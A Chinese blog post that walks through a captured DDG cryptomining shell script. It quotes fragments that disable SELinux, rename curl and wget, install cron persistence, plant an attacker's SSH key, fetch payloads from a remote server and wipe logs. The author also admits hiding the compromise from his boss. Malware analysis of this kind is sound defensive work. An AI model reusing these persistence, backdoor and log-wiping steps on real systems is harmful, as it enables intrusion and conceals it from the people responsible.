亮瞎了我的鈦合金雙眼(實力解剖一枚挖礦腳本,風騷操作亮瞎雙眼)
原創:小姐姐味道(微信公眾號ID:xjjdog),歡迎分享,轉載請保留出處。
公司有幾臺機器,最近cpu一直在瘋轉,就像是吃了春藥,一直在發熱。由于機器實在是太多,有這么幾臺安全性防護沒有到位,就一直躺在角落里瘋狂運轉。
直到統一的監控腳本接管了這幾臺機器,異常情況才得以浮出水面。最后發現了多個奇奇怪怪的進程,發現是一個挖礦腳本。下載下來學習了一下,發現腳本的編寫者,有著較高的水平。雖然在別人機器進行挖礦行為是不道德的,但掩蓋不了腳本編寫者的風騷操作。
挖礦,是計算機技術界最讓人迷惑的行為之一,但它賺錢。據悉,這段腳本名叫DDG,已經挖取了價值一千多萬人民幣的虛擬幣貨幣。
本著學習的目的,我稍微分析了一下這個神奇的腳本,也算是吸盡它的精華,為我所用。這事我都沒敢告訴老板,因為說了他也不懂,反生事端。不過和大家交流一下還是可以的,因為你們懂啊。
code 1
#!/bin/sh腳本的第一行,看起來是一行注釋,但其實并不是。它規定了接下來的腳本,將要采用哪一個SHELL執行。像我們平常用的bash、zsh等,屬于sh的超集,這個腳本使用sh作為執行的shell,具有更好的可移植性。
code 2
setenforce 0 2>dev/nullecho SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/nullsetenforce是Linux的selinux防火墻配置命令,執行setenforce 0 表示關閉selinux防火墻。2代表的是標準錯誤(stderr)的意思。所以后面,使用重定向符,將命令的錯誤輸出定向到/dev/null設備中。這個設備是一個虛擬設備,意思是什么都不干。非常適合靜悄悄的干壞事。
code 3
sync && echo 3 >/proc/sys/vm/drop_caches腳本貼心的幫我們釋放了一些內存資源,以便獲取更多的資源進行挖礦。
眾所周知,Linux系統會隨著長時間的運行,會產生很多緩存,清理方式就是寫一個數字到drop_caches文件里,這個數字通常為3。sync命令將所有未寫的系統緩沖區寫到磁盤中,執行之后就可以放心的釋放緩存了。
code 4
crondir='/var/spool/cron/'"$USER"cont=`cat ${crondir}`ssht=`cat /root/.ssh/authorized_keys`echo 1 > /etc/sysupdatesrtdir="/etc/sysupdates"bbdir="/usr/bin/curl"bbdira="/usr/bin/cur"ccdir="/usr/bin/wget"ccdira="/usr/bin/wge"mv /usr/bin/wget /usr/bin/getmv /usr/bin/xget /usr/bin/getmv /usr/bin/get /usr/bin/wgemv /usr/bin/curl /usr/bin/urlmv /usr/bin/xurl /usr/bin/urlmv /usr/bin/url /usr/bin/cur沒錯,上面這些語句就是完成了一些普通的操作。值得注意的是,它把我們的一些常用命令,使用mv命令給重名了。這在執行命令的時候,就會顯得分成功能的蛋疼。這腳本已經更改了計算機的一些文件,屬于犯罪的范疇了。
腳本為了復用一些功能,抽象出了很多的函數。我們直接跳到main函數的執行,然后看一下這個過程。
code 5
首先是kill_miner_proc函數。代碼很長,就不全部貼出來了。
kill_miner_proc(){ ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ... pkill -f biosetjenkins pkill -f Loopback ... crontab -r rm -rf /var/spool/cron/*挖礦領域是一個相愛相殺的領域。這個方法首先使用ps、grep、kill一套組合,干掉了同行的挖礦腳本,然后停掉了同行的cron腳本,黑吃黑的感覺。
在這段腳本里,使用了pkill命令。這個命令會終止進程,并按終端號踢出用戶,比較暴力。
code 6
接下來執行的是kill_sus_proc函數。
ps axf -o "pid"|while read prociddo...doneps加上o參數,可以指定要輸出的列,在這里只輸出的進程的pid,然后使用read函數,對procid進行遍歷操作。
code 7
ls -l /proc/$procid/exe | grep /tmpif [ $? -ne 1 ]then...fi上面就是遍歷操作過程了,我們可以看到if語句的語法。其中$?指的是上一個命令的退出狀態。0表示沒有錯誤,其他任何值表明有錯誤。-ne是不等于的意思,意思就是能夠匹配到tmp這個字符串。
code 8
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read prociddo...done呵呵,上面又來了一次循環遍歷。不過這次針對的目標,是cpu使用超過40%的進程。讀過xjjdog對awk分析的同學,對這個命令應該非常的熟悉。這就有點狠了:影響我挖礦的進程,都得死!
相煎何太急。
code 9
再接下來,腳本針對不同的用戶屬性,進行了不同的操作。
首先是root用戶。通過判斷是否存在$rtdir文件,來確定是否是root權限。
chattr -i /etc/sysupdate*chattr -i /etc/config.json*chattr -i /etc/update.sh*chattr -i /root/.ssh/authorized_keys*chattr -i /etc/networkservice使用chattr命令,把一些重要的文件,搞成不能任意改動的只讀屬性,也是夠損的。然后,操作cron程序,把腳本的更新服務加入到定時中。
就是下面這段腳本。
code 10
if [ ! -f "/usr/bin/crontab" ]then echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}else [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -fi注意[[ $cont =~ "update.sh" ]]這以小段代碼,怪異的很。[[ ]]是shell中內置的一個命令,支持字符串的模式匹配。使用=~的時候,甚至支持shell的正則表達式,強大的令人發指。它的輸出結果是一個bool類型,所以能夠使用||進行拼接。
而后面的單小括號 (),是的是一個命令組,括號中多個命令之間用分號隔開,最后一個命令可以沒有分號;和`cmd`的效果基本是一樣的。
code 11
搞完了定時任務,就要配置ssh自動登錄了,通過把公鑰追加到信任列表中就可以。
chmod 700 /root/.ssh/echo >> /root/.ssh/authorized_keyschmod 600 root/.ssh/authorized_keysecho "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/ oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+ 4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+ Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keyscode 12
說曹操曹操就到,下面的腳本就使用了``進行操作。
filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`if [ "$filesize_config" -ne "$config_size" ]then pkill -f sysupdate rm /etc/config.json downloads $config_url /etc/config.json $config_url_backupelse echo "no need download"fi通過一系列騷操作,獲取到配置文件的大小,如果判斷文件大小不一致,那么就重新下載一個。這就用到了downloads函數。
shell中的函數,看起來比較怪異,后面的參數傳遞,就像是腳本傳遞一樣,傳送給函數。
code 13
downloads $config_url /etc/config.json $config_url_backup這句話,就傳遞了三個參數。
當然,文件要從遙遠的服務器上下載。域名是.de結尾的,證明是個德國的域名,其他的我們一無所知。
downloads(){ if [ -f "/usr/bin/curl" ] then echo $1,$2 http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then curl --connect-timeout 10 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then curl --connect-timeout 10 --retry 100 $1 > $2 else curl --connect-timeout 10 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/cur" ] then http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1` if [ "$http_code" -eq "200" ] then cur --connect-timeout 10 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then cur --connect-timeout 10 --retry 100 $1 > $2 else cur --connect-timeout 10 --retry 100 $3 > $2fi elif [ -f "/usr/bin/wget" ] then wget --timeout=10 --tries=100 -O $2 $1 if [ $? -ne 0 ] then wget --timeout=10 --tries=100 -O $2 $3 fi elif [ -f "/usr/bin/wge" ] then wge --timeout=10 --tries=100 -O $2 $1 if [ $? -eq 0 ] then wge --timeout=10 --tries=100 -O $2 $3 fi fi}我認為,這段代碼作者寫的又臭又長,完全沒有體現出自己應有的水平。應該是趕工期,沒有想好代碼的復用,才會寫的這么有失水準。
我們上面說到,腳本改了幾個命令的名字,其中就有curl。這個命令是如此的強大,以至于腳本的作者都忍不住加了不少參數。
-I 是用來測試http頭信息
-m 設置最大傳輸時間
-o 指定保持的文件名。這里是/dev/null,呃呃呃
-s 靜默模式。不輸出任何東西
--connect-timeout 連接超時時間
--retry 重試次數,好狠100次
如果沒有curl?那就使用替補的wget,套路都是一樣的。
code 14
接下來是一系列相似的操作,最后,對iptables一批操作。
iptables -Fiptables -Xiptables -A OUTPUT -p tcp --dport 3333 -j DROPiptables -A OUTPUT -p tcp --dport 5555 -j DROPiptables -A OUTPUT -p tcp --dport 7777 -j DROPiptables -A OUTPUT -p tcp --dport 9999 -j DROPiptables -I INPUT -s 43.245.222.57 -j DROPservice iptables reloadcode 15
細心的腳本編寫者,還使用命令清理了操作日志。
history -cecho > /var/spool/mail/rootecho > /var/log/wtmpecho > /var/log/secureecho > /root/.bash_history不露死角,瀟灑走開。
可以看到,且不說真正的挖礦程序,僅僅是這個小腳本,作者也下足了功夫。腳本里命令繁多,使用方式多樣,縮緊格式優雅,除了有一點啰嗦,沒有加密之外,是一個非常好的拿來學習的腳本。
瞧了瞧被控制的機器,我趕緊偷偷的重裝了機器。
就當它是一個夢吧。老板問起的時候,什么都沒有發生過。
有需要拿到完整腳本的同學。關注xjjdog微信公眾號,回復wkjb,即可獲取。
作者簡介:小姐姐味道 (xjjdog),一個不允許程序員走彎路的公眾號。聚焦基礎架構和Linux。十年架構,日百億流量,與你探討高并發世界,給你不一樣的味道。我的個人微信xjjdog0,歡迎添加好友,進一步交流。